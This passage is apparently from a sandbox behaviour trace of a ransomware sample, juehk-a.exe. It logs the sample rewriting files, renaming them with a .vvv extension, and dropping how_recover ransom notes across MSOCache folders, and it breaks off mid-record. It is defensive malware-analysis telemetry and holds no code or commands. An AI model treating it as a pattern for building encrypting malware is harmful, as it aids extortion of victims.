7977.          sha1sum: 0da8725c6bbd8945b2e7cf56080ed5b13500808a
7978.          processinfo:
7979.            pid: 1648
7980.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
7981.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
7982.            ads:
7983.          fid (ads:): 562949953519971
7984.          ntstatus: 0x0
7985.          CreateOptions: 0x0
7986.        file:
7987.          timestamp: 49243
7988.          mode: rename
7989.          sequenceNumber: 601
7990.          filesize: 18158
7991.          md5sum: 59b7c2120d1cfc81c66609e84d202bdf
7992.          sha1sum: 0da8725c6bbd8945b2e7cf56080ed5b13500808a
7993.          processinfo:
7994.            pid: 1648
7995.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
7996.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
7997.          old_name: C:\eula.1036.txt
7998.          new_name: C:\eula.1036.txt.vvv
7999.            ads:
8000.          fid (ads:): 562949953519971
8001.          ntstatus: 0x0
8002.          CreateOptions: 0x0
8003.        file:
8004.          timestamp: 49351
8005.          mode: open
8006.          sequenceNumber: 602
8007.          value: C:\eula.1040.txt
8008.          filesize: 17734
8009.          processinfo:
8010.            pid: 1648
8011.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
8012.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
8013.            ads:
8014.          fid (ads:): 562949953519972
8015.          ntstatus: 0x0
8016.          CreateOptions: 0x60
8017.        apicall:
8018.          timestamp: 49704
8019.          repeat: 100
8020.          sequenceNumber: 603
8021.          processinfo:
8022.            pid: 1648
8023.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
8024.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
8025.          dllname: kernel32.dll
8026.          apiname: Sleep
8027.          address: 0x0041ed5b
8028.        file:
8029.          timestamp: 49946
8030.          mode: close
8031.          sequenceNumber: 604
8032.          value: C:\eula.1040.txt
8033.          filesize: 18158
8034.          md5sum: 59b7c2120d1cfc81c66609e84d202bdf
8035.          sha1sum: 0da8725c6bbd8945b2e7cf56080ed5b13500808a
8036.          processinfo:
8037.            pid: 1648
8038.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
8039.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
8040.            ads:
8041.          fid (ads:): 562949953519972
8042.          ntstatus: 0x0
8043.          CreateOptions: 0x0
8044.        file:
8045.          timestamp: 49953
8046.          mode: rename
8047.          sequenceNumber: 605
8048.          filesize: 18158
8049.          md5sum: 59b7c2120d1cfc81c66609e84d202bdf
8050.          sha1sum: 0da8725c6bbd8945b2e7cf56080ed5b13500808a
8051.          processinfo:
8052.            pid: 1648
8053.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
8054.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
8055.          old_name: C:\eula.1040.txt
8056.          new_name: C:\eula.1040.txt.vvv
8057.            ads:
8058.          fid (ads:): 562949953519972
8059.          ntstatus: 0x0
8060.          CreateOptions: 0x0
8061.        file:
8062.          timestamp: 49974
8063.          mode: open
8064.          sequenceNumber: 606
8065.          value: C:\eula.1041.txt
8066.          filesize: 118
8067.          processinfo:
8068.            pid: 1648
8069.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
8070.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
8071.            ads:
8072.          fid (ads:): 562949953519973
8073.          ntstatus: 0x0
8074.          CreateOptions: 0x60
8075.        file:
8076.          timestamp: 50138
8077.          mode: close
8078.          sequenceNumber: 607
8079.          value: C:\eula.1041.txt
8080.          filesize: 542
8081.          md5sum: d15fc8b6fc6bde19174233e913f55fcd
8082.          sha1sum: 0963b5f0f8862d37db1c9c8699ecb81c7d74c2ee
8083.          processinfo:
8084.            pid: 1648
8085.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
8086.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
8087.            ads:
8088.          fid (ads:): 562949953519973
8089.          ntstatus: 0x0
8090.          CreateOptions: 0x0
8091.        file:
8092.          timestamp: 50151
8093.          mode: rename
8094.          sequenceNumber: 608
8095.          filesize: 542
8096.          md5sum: d15fc8b6fc6bde19174233e913f55fcd
8097.          sha1sum: 0963b5f0f8862d37db1c9c8699ecb81c7d74c2ee
8098.          processinfo:
8099.            pid: 1648
8100.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
8101.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
8102.          old_name: C:\eula.1041.txt
8103.          new_name: C:\eula.1041.txt.vvv
8104.            ads:
8105.          fid (ads:): 562949953519973
8106.          ntstatus: 0x0
8107.          CreateOptions: 0x0
8108.        file:
8109.          timestamp: 50211
8110.          mode: open
8111.          sequenceNumber: 609
8112.          value: C:\eula.1042.txt
8113.          filesize: 17734
8114.          processinfo:
8115.            pid: 1648
8116.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
8117.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
8118.            ads:
8119.          fid (ads:): 562949953519974
8120.          ntstatus: 0x0
8121.          CreateOptions: 0x60
8122.        file:
8123.          timestamp: 50608
8124.          mode: close
8125.          sequenceNumber: 610
8126.          value: C:\eula.1042.txt
8127.          filesize: 18158
8128.          md5sum: 59b7c2120d1cfc81c66609e84d202bdf
8129.          sha1sum: 0da8725c6bbd8945b2e7cf56080ed5b13500808a
8130.          processinfo:
8131.            pid: 1648
8132.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
8133.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
8134.            ads:
8135.          fid (ads:): 562949953519974
8136.          ntstatus: 0x0
8137.          CreateOptions: 0x0
8138.        file:
8139.          timestamp: 50666
8140.          mode: rename
8141.          sequenceNumber: 611
8142.          filesize: 18158
8143.          md5sum: 59b7c2120d1cfc81c66609e84d202bdf
8144.          sha1sum: 0da8725c6bbd8945b2e7cf56080ed5b13500808a
8145.          processinfo:
8146.            pid: 1648
8147.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
8148.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
8149.          old_name: C:\eula.1042.txt
8150.          new_name: C:\eula.1042.txt.vvv
8151.            ads:
8152.          fid (ads:): 562949953519974
8153.          ntstatus: 0x0
8154.          CreateOptions: 0x0
8155.        file:
8156.          timestamp: 50713
8157.          mode: open
8158.          sequenceNumber: 612
8159.          value: C:\eula.2052.txt
8160.          filesize: 17734
8161.          processinfo:
8162.            pid: 1648
8163.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
8164.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
8165.            ads:
8166.          fid (ads:): 562949953519966
8167.          ntstatus: 0x0
8168.          CreateOptions: 0x60
8169.        file:
8170.          timestamp: 50960
8171.          mode: close
8172.          sequenceNumber: 613
8173.          value: C:\eula.2052.txt
8174.          filesize: 18158
8175.          md5sum: 59b7c2120d1cfc81c66609e84d202bdf
8176.          sha1sum: 0da8725c6bbd8945b2e7cf56080ed5b13500808a
8177.          processinfo:
8178.            pid: 1648
8179.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
8180.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
8181.            ads:
8182.          fid (ads:): 562949953519966
8183.          ntstatus: 0x0
8184.          CreateOptions: 0x0
8185.        file:
8186.          timestamp: 51021
8187.          mode: rename
8188.          sequenceNumber: 614
8189.          filesize: 18158
8190.          md5sum: 59b7c2120d1cfc81c66609e84d202bdf
8191.          sha1sum: 0da8725c6bbd8945b2e7cf56080ed5b13500808a
8192.          processinfo:
8193.            pid: 1648
8194.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
8195.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
8196.          old_name: C:\eula.2052.txt
8197.          new_name: C:\eula.2052.txt.vvv
8198.            ads:
8199.          fid (ads:): 562949953519966
8200.          ntstatus: 0x0
8201.          CreateOptions: 0x0
8202.        file:
8203.          timestamp: 51084
8204.          mode: open
8205.          sequenceNumber: 615
8206.          value: C:\eula.3082.txt
8207.          filesize: 17734
8208.          processinfo:
8209.            pid: 1648
8210.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
8211.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
8212.            ads:
8213.          fid (ads:): 562949953519970
8214.          ntstatus: 0x0
8215.          CreateOptions: 0x60
8216.        file:
8217.          timestamp: 51389
8218.          mode: close
8219.          sequenceNumber: 616
8220.          value: C:\eula.3082.txt
8221.          filesize: 18158
8222.          md5sum: 59b7c2120d1cfc81c66609e84d202bdf
8223.          sha1sum: 0da8725c6bbd8945b2e7cf56080ed5b13500808a
8224.          processinfo:
8225.            pid: 1648
8226.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
8227.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
8228.            ads:
8229.          fid (ads:): 562949953519970
8230.          ntstatus: 0x0
8231.          CreateOptions: 0x0
8232.        file:
8233.          timestamp: 51421
8234.          mode: rename
8235.          sequenceNumber: 617
8236.          filesize: 18158
8237.          md5sum: 59b7c2120d1cfc81c66609e84d202bdf
8238.          sha1sum: 0da8725c6bbd8945b2e7cf56080ed5b13500808a
8239.          processinfo:
8240.            pid: 1648
8241.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
8242.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
8243.          old_name: C:\eula.3082.txt
8244.          new_name: C:\eula.3082.txt.vvv
8245.            ads:
8246.          fid (ads:): 562949953519970
8247.          ntstatus: 0x0
8248.          CreateOptions: 0x0
8249.        file:
8250.          timestamp: 51486
8251.          mode: created
8252.          sequenceNumber: 618
8253.          value: C:\exec\how_recover+deg.txt
8254.          processinfo:
8255.            pid: 1648
8256.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
8257.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
8258.            ads:
8259.          fid (ads:): 562949953521043
8260.          ntstatus: 0x0
8261.          CreateOptions: 0x60
8262.        file:
8263.          timestamp: 51491
8264.          mode: close
8265.          sequenceNumber: 619
8266.          value: C:\exec\how_recover+deg.txt
8267.          filesize: 2673
8268.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
8269.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
8270.          processinfo:
8271.            pid: 1648
8272.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
8273.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
8274.            ads:
8275.          fid (ads:): 562949953521043
8276.          ntstatus: 0x0
8277.          CreateOptions: 0x0
8278.        file:
8279.          timestamp: 51498
8280.          mode: created
8281.          sequenceNumber: 620
8282.          value: C:\exec\how_recover+deg.html
8283.          processinfo:
8284.            pid: 1648
8285.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
8286.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
8287.            ads:
8288.          fid (ads:): 562949953521044
8289.          ntstatus: 0x0
8290.          CreateOptions: 0x60
8291.        file:
8292.          timestamp: 51502
8293.          mode: close
8294.          sequenceNumber: 621
8295.          value: C:\exec\how_recover+deg.html
8296.          filesize: 9480
8297.          md5sum: a68c3caf0be8f1a393c697136926cfd4
8298.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
8299.          processinfo:
8300.            pid: 1648
8301.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
8302.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
8303.            ads:
8304.          fid (ads:): 562949953521044
8305.          ntstatus: 0x0
8306.          CreateOptions: 0x0
8307.        file:
8308.          timestamp: 51507
8309.          mode: find
8310.          sequenceNumber: 622
8311.          value: C:\MSOCache\*
8312.          processinfo:
8313.            pid: 1648
8314.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
8315.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
8316.          ntstatus: 0x0
8317.          CreateOptions: 0x0
8318.        file:
8319.          timestamp: 51510
8320.          mode: find
8321.          sequenceNumber: 623
8322.          value: C:\MSOCache\*\*
8323.          processinfo:
8324.            pid: 1648
8325.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
8326.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
8327.          ntstatus: 0x0
8328.          CreateOptions: 0x0
8329.        file:
8330.          timestamp: 51515
8331.          mode: created
8332.          sequenceNumber: 624
8333.          value: C:\MSOCache\All Users\{90150000-0016-0409-1000-0000000FF1CE}-C\how_recover+deg.txt
8334.          processinfo:
8335.            pid: 1648
8336.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
8337.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
8338.            ads:
8339.          fid (ads:): 562949953521045
8340.          ntstatus: 0x0
8341.          CreateOptions: 0x60
8342.        file:
8343.          timestamp: 51522
8344.          mode: close
8345.          sequenceNumber: 625
8346.          value: C:\MSOCache\All Users\{90150000-0016-0409-1000-0000000FF1CE}-C\how_recover+deg.txt
8347.          filesize: 2673
8348.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
8349.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
8350.          processinfo:
8351.            pid: 1648
8352.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
8353.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
8354.            ads:
8355.          fid (ads:): 562949953521045
8356.          ntstatus: 0x0
8357.          CreateOptions: 0x0
8358.        file:
8359.          timestamp: 51528
8360.          mode: created
8361.          sequenceNumber: 626
8362.          value: C:\MSOCache\All Users\{90150000-0016-0409-1000-0000000FF1CE}-C\how_recover+deg.html
8363.          processinfo:
8364.            pid: 1648
8365.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
8366.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
8367.            ads:
8368.          fid (ads:): 562949953521046
8369.          ntstatus: 0x0
8370.          CreateOptions: 0x60
8371.        file:
8372.          timestamp: 51534
8373.          mode: close
8374.          sequenceNumber: 627
8375.          value: C:\MSOCache\All Users\{90150000-0016-0409-1000-0000000FF1CE}-C\how_recover+deg.html
8376.          filesize: 9480
8377.          md5sum: a68c3caf0be8f1a393c697136926cfd4
8378.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
8379.          processinfo:
8380.            pid: 1648
8381.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
8382.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
8383.            ads:
8384.          fid (ads:): 562949953521046
8385.          ntstatus: 0x0
8386.          CreateOptions: 0x0
8387.        file:
8388.          timestamp: 51542
8389.          mode: created
8390.          sequenceNumber: 628
8391.          value: C:\MSOCache\All Users\{90150000-0018-0409-1000-0000000FF1CE}-C\how_recover+deg.txt
8392.          processinfo:
8393.            pid: 1648
8394.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
8395.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
8396.            ads:
8397.          fid (ads:): 562949953521047
8398.          ntstatus: 0x0
8399.          CreateOptions: 0x60
8400.        file:
8401.          timestamp: 51547
8402.          mode: close
8403.          sequenceNumber: 629
8404.          value: C:\MSOCache\All Users\{90150000-0018-0409-1000-0000000FF1CE}-C\how_recover+deg.txt
8405.          filesize: 2673
8406.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
8407.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
8408.          processinfo:
8409.            pid: 1648
8410.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
8411.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
8412.            ads:
8413.          fid (ads:): 562949953521047
8414.          ntstatus: 0x0
8415.          CreateOptions: 0x0
8416.        file:
8417.          timestamp: 51571
8418.          mode: created
8419.          sequenceNumber: 630
8420.          value: C:\MSOCache\All Users\{90150000-0018-0409-1000-0000000FF1CE}-C\how_recover+deg.html
8421.          processinfo:
8422.            pid: 1648
8423.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
8424.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
8425.            ads:
8426.          fid (ads:): 562949953521048
8427.          ntstatus: 0x0
8428.          CreateOptions: 0x60
8429.        file:
8430.          timestamp: 51578
8431.          mode: close
8432.          sequenceNumber: 631
8433.          value: C:\MSOCache\All Users\{90150000-0018-0409-1000-0000000FF1CE}-C\how_recover+deg.html
8434.          filesize: 9480
8435.          md5sum: a68c3caf0be8f1a393c697136926cfd4
8436.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
8437.          processinfo:
8438.            pid: 1648
8439.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
8440.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
8441.            ads:
8442.          fid (ads:): 562949953521048
8443.          ntstatus: 0x0
8444.          CreateOptions: 0x0
8445.        file:
8446.          timestamp: 51648
8447.          mode: created
8448.          sequenceNumber: 632
8449.          value: C:\MSOCache\All Users\{90150000-0019-0409-1000-0000000FF1CE}-C\how_recover+deg.txt
8450.          processinfo:
8451.            pid: 1648
8452.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
8453.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
8454.            ads:
8455.          fid (ads:): 562949953521049
8456.          ntstatus: 0x0
8457.          CreateOptions: 0x60
8458.        file:
8459.          timestamp: 51663
8460.          mode: close
8461.          sequenceNumber: 633
8462.          value: C:\MSOCache\All Users\{90150000-0019-0409-1000-0000000FF1CE}-C\how_recover+deg.txt
8463.          filesize: 2673
8464.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
8465.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
8466.          processinfo:
8467.            pid: 1648
8468.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
8469.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
8470.            ads:
8471.          fid (ads:): 562949953521049
8472.          ntstatus: 0x0
8473.          CreateOptions: 0x0
8474.        file:
8475.          timestamp: 51670
8476.          mode: created
8477.          sequenceNumber: 634
8478.          value: C:\MSOCache\All Users\{90150000-0019-0409-1000-0000000FF1CE}-C\how_recover+deg.html
8479.          processinfo:
8480.            pid: 1648
8481.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
8482.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
8483.            ads:
8484.          fid (ads:): 562949953521050
8485.          ntstatus: 0x0
8486.          CreateOptions: 0x60
8487.        file:
8488.          timestamp: 51677
8489.          mode: close
8490.          sequenceNumber: 635
8491.          value: C:\MSOCache\All Users\{90150000-0019-0409-1000-0000000FF1CE}-C\how_recover+deg.html
8492.          filesize: 9480
8493.          md5sum: a68c3caf0be8f1a393c697136926cfd4
8494.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
8495.          processinfo:
8496.            pid: 1648
8497.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
8498.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
8499.            ads:
8500.          fid (ads:): 562949953521050
8501.          ntstatus: 0x0
8502.          CreateOptions: 0x0
8503.        file:
8504.          timestamp: 51713
8505.          mode: created
8506.          sequenceNumber: 636
8507.          value: C:\MSOCache\All Users\{90150000-001A-0409-1000-0000000FF1CE}-C\how_recover+deg.txt
8508.          processinfo:
8509.            pid: 1648
8510.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
8511.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
8512.            ads:
8513.          fid (ads:): 562949953521051
8514.          ntstatus: 0x0
8515.          CreateOptions: 0x60
8516.        file:
8517.          timestamp: 51719
8518.          mode: close
8519.          sequenceNumber: 637
8520.          value: C:\MSOCache\All Users\{90150000-001A-0409-1000-0000000FF1CE}-C\how_recover+deg.txt
8521.          filesize: 2673
8522.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
8523.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
8524.          processinfo:
8525.            pid: 1648
8526.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
8527.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
8528.            ads:
8529.          fid (ads:): 562949953521051
8530.          ntstatus: 0x0
8531.          CreateOptions: 0x0
8532.        file:
8533.          timestamp: 51744
8534.          mode: created
8535.          sequenceNumber: 638
8536.          value: C:\MSOCache\All Users\{90150000-001A-0409-1000-0000000FF1CE}-C\how_recover+deg.html
8537.          processinfo:
8538.            pid: 1648
8539.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
8540.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
8541.            ads:
8542.          fid (ads:): 562949953521052
8543.          ntstatus: 0x0
8544.          CreateOptions: 0x60
8545.        file:
8546.          timestamp: 51749
8547.          mode: close
8548.          sequenceNumber: 639
8549.          value: C:\MSOCache\All Users\{90150000-001A-0409-1000-0000000FF1CE}-C\how_recover+deg.html
8550.          filesize: 9480
8551.          md5sum: a68c3caf0be8f1a393c697136926cfd4
8552.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
8553.          processinfo:
8554.            pid: 1648
8555.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
8556.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
8557.            ads:
8558.          fid (ads:): 562949953521052
8559.          ntstatus: 0x0
8560.          CreateOptions: 0x0
8561.        file:
8562.          timestamp: 51783
8563.          mode: created
8564.          sequenceNumber: 640
8565.          value: C:\MSOCache\All Users\{90150000-001B-0409-1000-0000000FF1CE}-C\how_recover+deg.txt
8566.          processinfo:
8567.            pid: 1648
8568.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
8569.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
8570.            ads:
8571.          fid (ads:): 562949953521053
8572.          ntstatus: 0x0
8573.          CreateOptions: 0x60
8574.        file:
8575.          timestamp: 51790
8576.          mode: close
8577.          sequenceNumber: 641
8578.          value: C:\MSOCache\All Users\{90150000-001B-0409-1000-0000000FF1CE}-C\how_recover+deg.txt
8579.          filesize: 2673
8580.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
8581.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
8582.          processinfo:
8583.            pid: 1648
8584.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
8585.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
8586.            ads:
8587.          fid (ads:): 562949953521053
8588.          ntstatus: 0x0
8589.          CreateOptions: 0x0
8590.        file:
8591.          timestamp: 51797
8592.          mode: created
8593.          sequenceNumber: 642
8594.          value: C:\MSOCache\All Users\{90150000-001B-0409-1000-0000000FF1CE}-C\how_recover+deg.html
8595.          processinfo:
8596.            pid: 1648
8597.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
8598.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
8599.            ads:
8600.          fid (ads:): 562949953521054
8601.          ntstatus: 0x0
8602.          CreateOptions: 0x60
8603.        file:
8604.          timestamp: 51804
8605.          mode: close
8606.          sequenceNumber: 643
8607.          value: C:\MSOCache\All Users\{90150000-001B-0409-1000-0000000FF1CE}-C\how_recover+deg.html
8608.          filesize: 9480
8609.          md5sum: a68c3caf0be8f1a393c697136926cfd4
8610.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
8611.          processinfo:
8612.            pid: 1648
8613.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
8614.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
8615.            ads:
8616.          fid (ads:): 562949953521054
8617.          ntstatus: 0x0
8618.          CreateOptions: 0x0
8619.        file:
8620.          timestamp: 51942
8621.          mode: created
8622.          sequenceNumber: 644
8623.          value: C:\MSOCache\All Users\{90150000-002C-0409-1000-0000000FF1CE}-C\Proof.en\how_recover+deg.txt
8624.          processinfo:
8625.            pid: 1648
8626.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
8627.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
8628.            ads:
8629.          fid (ads:): 562949953521055
8630.          ntstatus: 0x0
8631.          CreateOptions: 0x60
8632.        file:
8633.          timestamp: 51951
8634.          mode: close
8635.          sequenceNumber: 645
8636.          value: C:\MSOCache\All Users\{90150000-002C-0409-1000-0000000FF1CE}-C\Proof.en\how_recover+deg.txt
8637.          filesize: 2673
8638.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
8639.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
8640.          processinfo:
8641.            pid: 1648
8642.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
8643.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
8644.            ads:
8645.          fid (ads:): 562949953521055
8646.          ntstatus: 0x0
8647.          CreateOptions: 0x0
8648.        file:
8649.          timestamp: 51981
8650.          mode: created
8651.          sequenceNumber: 646
8652.          value: C:\MSOCache\All Users\{90150000-002C-0409-1000-0000000FF1CE}-C\Proof.en\how_recover+deg.html
8653.          processinfo:
8654.            pid: 1648
8655.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
8656.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
8657.            ads:
8658.          fid (ads:): 562949953521056
8659.          ntstatus: 0x0
8660.          CreateOptions: 0x60
8661.        file:
8662.          timestamp: 51990
8663.          mode: close
8664.          sequenceNumber: 647
8665.          value: C:\MSOCache\All Users\{90150000-002C-0409-1000-0000000FF1CE}-C\Proof.en\how_recover+deg.html
8666.          filesize: 9480
8667.          md5sum: a68c3caf0be8f1a393c697136926cfd4
8668.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
8669.          processinfo:
8670.            pid: 1648
8671.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
8672.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
8673.            ads:
8674.          fid (ads:): 562949953521056
8675.          ntstatus: 0x0
8676.          CreateOptions: 0x0
8677.        file:
8678.          timestamp: 51998
8679.          mode: created
8680.          sequenceNumber: 648
8681.          value: C:\MSOCache\All Users\{90150000-002C-0409-1000-0000000FF1CE}-C\Proof.es\how_recover+deg.txt
8682.          processinfo:
8683.            pid: 1648
8684.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
8685.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
8686.            ads:
8687.          fid (ads:): 562949953521057
8688.          ntstatus: 0x0
8689.          CreateOptions: 0x60
8690.        file:
8691.          timestamp: 52006
8692.          mode: close
8693.          sequenceNumber: 649
8694.          value: C:\MSOCache\All Users\{90150000-002C-0409-1000-0000000FF1CE}-C\Proof.es\how_recover+deg.txt
8695.          filesize: 2673
8696.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
8697.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
8698.          processinfo:
8699.            pid: 1648
8700.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
8701.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
8702.            ads:
8703.          fid (ads:): 562949953521057
8704.          ntstatus: 0x0
8705.          CreateOptions: 0x0
8706.        file:
8707.          timestamp: 52063
8708.          mode: created
8709.          sequenceNumber: 650
8710.          value: C:\MSOCache\All Users\{90150000-002C-0409-1000-0000000FF1CE}-C\Proof.es\how_recover+deg.html
8711.          processinfo:
8712.            pid: 1648
8713.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
8714.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
8715.            ads:
8716.          fid (ads:): 562949953521058
8717.          ntstatus: 0x0
8718.          CreateOptions: 0x60
8719.        file:
8720.          timestamp: 52070
8721.          mode: close
8722.          sequenceNumber: 651
8723.          value: C:\MSOCache\All Users\{90150000-002C-0409-1000-0000000FF1CE}-C\Proof.es\how_recover+deg.html
8724.          filesize: 9480
8725.          md5sum: a68c3caf0be8f1a393c697136926cfd4
8726.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
8727.          processinfo:
8728.            pid: 1648
8729.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
8730.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
8731.            ads:
8732.          fid (ads:): 562949953521058
8733.          ntstatus: 0x0
8734.          CreateOptions: 0x0
8735.        file:
8736.          timestamp: 52085
8737.          mode: created
8738.          sequenceNumber: 652
8739.          value: C:\MSOCache\All Users\{90150000-002C-0409-1000-0000000FF1CE}-C\Proof.fr\how_recover+deg.txt
8740.          processinfo:
8741.            pid: 1648
8742.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
8743.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
8744.            ads:
8745.          fid (ads:): 562949953521059
8746.          ntstatus: 0x0
8747.          CreateOptions: 0x60
8748.        file:
8749.          timestamp: 52091
8750.          mode: close
8751.          sequenceNumber: 653
8752.          value: C:\MSOCache\All Users\{90150000-002C-0409-1000-0000000FF1CE}-C\Proof.fr\how_recover+deg.txt
8753.          filesize: 2673
8754.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
8755.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
8756.          processinfo:
